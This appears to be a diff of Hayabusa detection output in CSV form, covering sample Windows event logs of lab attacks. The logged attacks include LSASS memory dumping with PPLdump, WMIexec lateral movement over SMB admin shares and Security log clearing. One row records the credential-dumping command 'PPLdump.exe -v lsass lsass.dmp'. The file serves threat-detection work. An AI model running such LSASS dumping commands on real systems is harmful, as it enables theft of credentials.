+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe  -v lsass lsass.dmp  :  Path: C:\Users\IEUser\Desktop\PPLdump.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: PPLdump.exe  -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CreateMiniDump Hacktool,,rules/sigma/file_event/file_event_hktl_createminidump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx
+2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47020  :  LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 34114  :  LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 57116  :  LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.308 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.367 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.406 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.441 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
+2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619425227.894209  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx"
